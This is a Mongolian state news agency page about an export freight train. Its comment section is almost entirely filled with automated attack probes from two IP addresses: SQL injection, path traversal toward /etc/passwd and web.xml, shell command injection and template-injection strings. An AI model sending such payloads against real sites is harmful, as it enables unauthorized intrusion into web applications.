Экспортын шинэ тээврийн анхны галт тэрэг явж эхэллээ

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-09 14:06:32
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',12)='c 185.234.72.114 493 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',0)='y 185.234.72.114 493 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:12 185.234.72.114 493 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 493 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 493 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(12))::text>'0 185.234.72.114 493 өдөр

  123456
 • ../../../../WEB-INF/web.xml 185.234.72.114 493 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 493 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 493 өдөр

  123456
 • admin"and(select*from(select+sleep(12))a/**/union/**/select+1)=" 185.234.72.114 493 өдөр

  123456
 • ../../../WEB-INF/web.xml 185.234.72.114 493 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 493 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 185.234.72.114 493 өдөр

  123456
 • admin'and(select*from(select+sleep(12))a/**/union/**/select+1)=' 185.234.72.114 493 өдөр

  123456
 • ../../WEB-INF/web.xml 185.234.72.114 493 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 493 өдөр

  123456
 • admin"and"l"="p 185.234.72.114 493 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 493 өдөр

  123456
 • admin"and"l"="l 185.234.72.114 493 өдөр

  123456
 • ../WEB-INF/web.xml 185.234.72.114 493 өдөр

  123456
 • WEB-INF/web.xml;admin 185.234.72.114 493 өдөр

  123456
 • admin'and'a'='v 185.234.72.114 493 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 493 өдөр

  123456
 • admin'and'r'='r 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',12)='p
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',0)='d
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('u',12)
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 493 өдөр

  123456
 • ./../../../../../../Windows/win.ini 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('u',0)
 • ../../../../../../Windows/win.ini 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:12
 • admin 185.234.72.114 493 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 493 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:12'/**/
 • admin 185.234.72.114 493 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 493 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(12))::text>'0
 • admin 185.234.72.114 493 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 493 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(12))>0/**/
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456"and(select*from(select+sleep(12))a/**/union/**/select+1)="
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 493 өдөр

  123456
 • admin'"\( 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456'and(select*from(select+sleep(12))a/**/union/**/select+1)='
 • admin鎈'"\( 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  (select*from(select+sleep(12)union/**/select+1)a)
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 493 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1130115073')))>'0 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456"and"y"="b
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456"and"m"="m
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1826613485'))) 185.234.72.114 493 өдөр

  123456
 • admin/**/and/**/cast(md5('1863247420')as/**/int)>0 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456'and'r'='u
 • admin'and(select'1'from/**/cast(md5(1125584142)as/**/int))>'0 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456'and'n'='n
 • admin 185.234.72.114 493 өдөр

  123456/**/and+4=7
 • extractvalue(1,concat(char(126),md5(1656148110))) 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456/**/and+1=1
 • admin"and/**/extractvalue(1,concat(char(126),md5(1836791787)))and" 185.234.72.114 493 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 493 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1232940736)))and' 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456'"\(
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456鎈'"\(
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  <%- 906537646+940669496 %>
 • admin 185.234.72.114 493 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1136021709')))>'0
 • %u2215etc%u2215passwd 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  #set($c=837288438+879331834)${c}$c
 • admin 185.234.72.114 493 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1444672732')))
 • admin 185.234.72.114 493 өдөр

  123456/**/and/**/cast(md5('1280867819')as/**/int)>0
 • %2fetc%2fpasswd 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  ${(836980331+864366911)?c}
 • admin 185.234.72.114 493 өдөр

  123456'and(select'1'from/**/cast(md5(1013673053)as/**/int))>'0
 • admin 185.234.72.114 493 өдөр

  extractvalue(1,concat(char(126),md5(1308688112)))
 • admin 185.234.72.114 493 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1980255321)))and"
 • /etc/passwdadmin 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  ${808914362+811623405}
 • /etc/passwd 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1785542596)))and'
 • admin 185.234.72.114 493 өдөр

  expr 807922992 + 889753876
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456&set /A 995576717+841607224
 • admin 185.234.72.114 493 өдөр

  123456$(expr 847678192 + 862794216)
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  /*1*/{{984620297+942708966}}
 • admin 185.234.72.114 493 өдөр

  123456|expr 843760128 + 906699764
 • admin 185.234.72.114 493 өдөр

  123456 expr 872610288 + 883479962
 • ./../../../../../../etc/passwd 185.234.72.114 493 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456
 • ../../../../../../etc/passwd 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456
 • <%- 808590785+881391159 %> 185.234.72.114 493 өдөр

  123456
 • #set($c=965916677+848438130)${c}$c 185.234.72.114 493 өдөр

  123456
 • '-var_dump(md5(578615997))-' 185.234.72.114 493 өдөр

  123456
 • expr 934936417 + 814758505 185.234.72.114 493 өдөр

  123456
 • ${(844666529+800225146)?c} 185.234.72.114 493 өдөр

  123456
 • ${808031903+801170196} 185.234.72.114 493 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  hdhwhrpraysdudlnskfk
 • admin 185.234.72.114 493 өдөр

  123456
 • admin&set /A 868056441+898186325 185.234.72.114 493 өдөр

  123456
 • ${@var_dump(md5(564749439))}; 185.234.72.114 493 өдөр

  123456
 • /*1*/{{961178997+989180431}} 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  '-var_dump(md5(446843970))-'
 • admin$(expr 800393230 + 841281075) 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456
 • admin|expr 880060057 + 988157334 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  ${@var_dump(md5(313393389))};
 • ${982434455+909560332} 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456
 • admin expr 928877520 + 878682670 185.234.72.114 493 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 493 өдөр

  123456
 • hdhwhrpraysdudlnskfk 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456
 • admin 185.234.72.114 493 өдөр

  123456
 • admin 194.163.191.42 494 өдөр

  123456'"\(
 • admin 194.163.191.42 494 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 494 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1053098337')))>'0
 • admin 194.163.191.42 494 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1688933526')))
 • admin 194.163.191.42 494 өдөр

  123456/**/and/**/cast(md5('1282707014')as/**/int)>0
 • admin 194.163.191.42 494 өдөр

  123456'and(select'1'from/**/cast(md5(1545451490)as/**/int))>'0
 • admin 194.163.191.42 494 өдөр

  extractvalue(1,concat(char(126),md5(1584349315)))
 • admin 194.163.191.42 494 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1932759285)))and"
 • admin 194.163.191.42 494 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1948808117)))and'
 • admin'"\( 194.163.191.42 494 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 494 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1192592149')))>'0 194.163.191.42 494 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1596063978'))) 194.163.191.42 494 өдөр

  123456
 • admin/**/and/**/cast(md5('1534402751')as/**/int)>0 194.163.191.42 494 өдөр

  123456
 • admin 194.163.191.42 494 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1692014384)as/**/int))>'0 194.163.191.42 494 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 494 өдөр

  123456
 • expr 948018384 + 935840369 194.163.191.42 494 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1374627049))) 194.163.191.42 494 өдөр

  123456
 • admin 194.163.191.42 494 өдөр

  ${854885270+804260772}
 • admin 194.163.191.42 494 өдөр

  ${(903514234+951673386)?c}
 • admin 194.163.191.42 494 өдөр

  omegejzxnyhnxjgdtdxz
 • admin"and/**/extractvalue(1,concat(char(126),md5(1362532892)))and" 194.163.191.42 494 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1007194042)))and' 194.163.191.42 494 өдөр

  123456
 • admin 194.163.191.42 494 өдөр

  123456
 • '-var_dump(md5(376418087))-' 194.163.191.42 494 өдөр

  123456
 • admin&set /A 815550660+825630614 194.163.191.42 494 өдөр

  123456
 • ${@var_dump(md5(144294494))}; 194.163.191.42 494 өдөр

  123456
 • admin 194.163.191.42 494 өдөр

  '-var_dump(md5(355660803))-'
 • admin 194.163.191.42 494 өдөр

  123456
 • omegejzxnyhnxjgdtdxz 194.163.191.42 494 өдөр

  123456
 • admin$(expr 988118258 + 844776649) 194.163.191.42 494 өдөр

  123456
 • admin 194.163.191.42 494 өдөр

  ${878309328+956982459}
 • admin 194.163.191.42 494 өдөр

  123456
 • admin|expr 817142396 + 928551367 194.163.191.42 494 өдөр

  123456
 • admin expr 954449996 + 940917142 194.163.191.42 494 өдөр

  123456
 • admin 194.163.191.42 494 өдөр

  /*1*/{{842670794+883479906}}
 • ${879160150+969264035} 194.163.191.42 494 өдөр

  123456
 • admin 194.163.191.42 494 өдөр

  123456
 • admin 194.163.191.42 494 өдөр

  ${@var_dump(md5(941007309))};
 • admin 194.163.191.42 494 өдөр

  123456